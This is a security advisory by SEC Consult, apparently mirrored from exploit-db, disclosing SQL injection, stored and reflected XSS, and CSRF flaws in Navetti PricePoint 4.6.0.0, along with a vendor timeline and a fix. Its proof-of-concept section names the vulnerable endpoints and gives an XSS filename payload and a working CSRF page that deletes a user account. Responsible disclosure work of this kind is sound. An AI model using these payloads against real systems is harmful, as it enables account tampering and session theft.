Navetti PricePoint 4.6.0.0 – SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery

  • 作者: SEC Consult
    日期: 2017-03-08
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  • 来源:https://www.exploit-db.com/exploits/41554/
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    title: Multiple vulnerabilities
    product: Navetti PricePoint
     vulnerable version: 4.6.0.0
    fixed version: 4.7.0.0 or higher
     CVE number: -
     impact: high/critical
     homepage: http://www.navetti.com/
    found: 2016-07-18
     by: W. Schober (Office Vienna)
     SEC Consult Vulnerability Lab
    
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    Vendor description:
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    "Navetti PricePoint is the ultimate business tool for controlling, managing and
    measuring all aspects of your pricing. Our clients have been able to increase
    their revenue and profitability substantially, implement market- and value-based
    pricing, increase customer trust and implement a common business language
    throughout their organization. In addition, with Navetti PricePoint our clients
    are able to implement governance processes, manage risk and ensure organization
    compliance, and attain business sustainability."
    
    Source:
    http://www.navetti.com/our-expertise/navetti-pricepoint/
    
    
    Business recommendation:
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    During a quick security check, SEC Consult identified four vulnerabilities,
    which are partially critical. As the time frame of the test was limited, it is
    suspected that there are more vulnerabilities in the application.
    
    It is highly recommended by SEC Consult to apply the patch resolving the
    identified vulnerabilities before using Navetti PricePoint in an environment
    with potential attackers.
    
    
    Vulnerability overview/description:
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    1) SQL Injection (Blind boolean based)
    Navetti PricePoint is prone to SQL injection attacks. The attacks can be
    executed by all privilege levels, ranging from the lowest privileged users to
    the highest privileged users.
    
    By exploiting this vulnerability, an attacker gains access to all records
    stored in the database with the privileges of the database user.
    
    2) Multiple persistent cross site scripting vulnerabilities
    The web application suffers from multiple persistent cross site scripting issues.
    Low privileged users as well as high privileged users, are able to inject
    malicious JavaScript payloads persistently in the application. This
    vulnerability is even more critical, because it can be used by a low privileged
    user who wants to elevate his privileges. The low privileged attacker can
    place a payload which creates a new superuser, or add his own account to the
    superuser group. If a superuser logs in to the application, the JavaScript
    payload is executed with the rights of the superuser and the new user is
    created or added to the superuser group.
    
    3) Multiple reflected cross site scripting vulnerabilities
    Navetti PricePoint suffers from multiple reflected cross site scripting issues.
    The code which is used to generate error messages inside of the application,
    does not correctly escape/sanitize user input. Due to that all error messages
    containing user input are prone to reflected cross site scripting attacks.
    Furthermore the file upload dialog does not correctly sanitize the file name of
    uploaded files. If a file name contains a JavaScript payload, it is executed in
    the file upload dialog.
    
    4) Cross Site Request Forgery
    Navetti PricePoint doesn't implement any kind of cross site request forgery
    protection. Attackers are able to execute arbitrary requests with the privileges
    of any user. The only requirement is, that the victim clicks on a malicious
    link. For example an administrator can be forced to execute unwanted actions.
    Some of these actions are:
    
    -) Add users
    -) Delete users
    -) Add users to an arbitrary role
    -) Change internal settings of the application
    
    
    Proof of concept:
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    1) SQL Injection (Blind boolean based)
    The search function in the tree structure, which displays various groups, does
    not properly validate user input, allowing an attacker with any privilege level
    toinject arbitrary SQL commands and read the contents of the whole database.
    
    The following URL could be used to perform blind SQL injection attacks:
    -) URL: /NBN.Host/PMWorkspace/PMWorkspace/FamilieTreeSearch
    (Parameter: searchString, Type: GET)
    
    2) Multiple persistent cross site scripting vulnerabilities
    The following URL parameters have been identified to be vulnerable against
    persistent cross site scripting:
    
    -) URL: /NBN.Host/Component/Competitors/AddEdit (Parameter: name,POST)
    -) URL: /NBN.Host/Component/ItemSearchGrid/EditData (Parameter: Quality105,POST)
    -) URL: /NBN.Host/component/GroupInfo/SaveGroup (Parameter: name,POST)
    
    The proof of concept shows just selected examples of cross-site scripting
    vulnerabilities. Based on the conducted tests, SEC Consult identified that
    proper input validation is lacking.
    Due to the limited time frame of the test, it was not possible to verify every
    single parameter of the application. Therefore, it can be assumed, that there
    are similar flaws in other parts of the web application.
    
    3) Multiple reflected cross site scripting vulnerabilities
    The application is also prone to reflected cross site scripting attacks. The
    vulnerabilities were observed in at least two main parts of the application.
    Those two parts are error messages and the file upload functionality.
    
    -) Error Messages
    Every user input which is reflected in error messages, is not correctly
    escaped and injection of malicious JavaScript code is possible.
    
    -) File uploads
    The file upload functionality is not correctly escaping the filename of
    uploaded files. If a victim is forced to upload a special crafted file, an
    arbitrary JavaScript payload can be triggered and executed in the victim's
    context. An example for a working, but very obvious payload in the filename
    would be the following example:
    
    -) <img src=x onerror=alert(document.cookies)>.xlsx
    
    4) Cross Site Request Forgery
    The application is prone to cross site request forgery attacks because no
    measures such as CSRF tokens or nounces, are in place. The following proof of
    concept deletes the user account
    with ID 18:
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    <html>
    <body>
     <script>
    function submitRequest()
    {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://($IP|$Domain)/NBN.Host/PermissionsManagement/
    PermissionsManagement/DeleteUsers", true);
    xhr.setRequestHeader("Accept", "*/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "text/plain");
    xhr.withCredentials = true;
    var body = "{\"DeleteAll\":false,\"UserIDs\":[\"18\"]}";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
    }
    </script>
    <form action="#">
     <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
    </body>
    </html>
    
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    If a victim visits a website, which is hosted by an attacker, the script above
    would be executed and the user with the userID 18 would be deleted. Due to the
    complete absence of measures against cross site request forgery, it can be
    assumed that the application is vulnerable for this
    kind of attack.
    
    
    Vulnerable / tested versions:
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    SEC Consult tested Navetti PricePoint 4.6.0.0.
    This version was the latest version at the time of the discovery.
    
    
    Vendor contact timeline:
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    2016-07-27: Contacting vendor through info@navetti.com
    2016-07-27: Vendor provided a technical contact who is responsible for
    vulnerability coordination, furthermore clear-text communication
    was requested.
    2016-07-27: Providing advisory and proof of concept through insecure channel
    as requested.
    2016-08-05: Navetti provided a status update concerning a new version of
    Navetti Price Point. The release date of the version, where all
    the vulnerabilities are fixed, will be provided soon
    2016-08-11: Navetti sent an update containing their upcoming release schedule.
    The update of Navetti Price Point, which should fix all the
    vulnerabilities, will be released on 2016-10-01.
    2016-10-01: Patch available
    2017-03-08: SEC Consult releases security advisory
    
    
    Solution:
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    Update to the latest version available. According to Navetti, all the
    vulnerabilities are fixed in release 4.7.0.0.
    
    According to the vendor, they have further improved their software security
    since our initial contact.
    
    
    Workaround:
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    No workaround available
    
    
    Advisory URL:
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    https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
    
    
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